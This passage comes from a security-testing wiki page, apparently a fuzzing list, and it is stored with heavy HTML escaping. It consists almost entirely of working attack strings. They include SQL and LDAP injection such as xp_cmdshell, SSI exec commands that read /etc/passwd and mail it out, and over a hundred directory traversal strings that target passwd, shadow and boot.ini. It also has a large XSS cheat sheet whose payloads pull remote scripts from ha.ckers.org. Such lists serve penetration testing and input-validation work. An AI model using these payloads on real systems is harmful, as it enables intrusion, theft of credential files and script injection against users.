&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
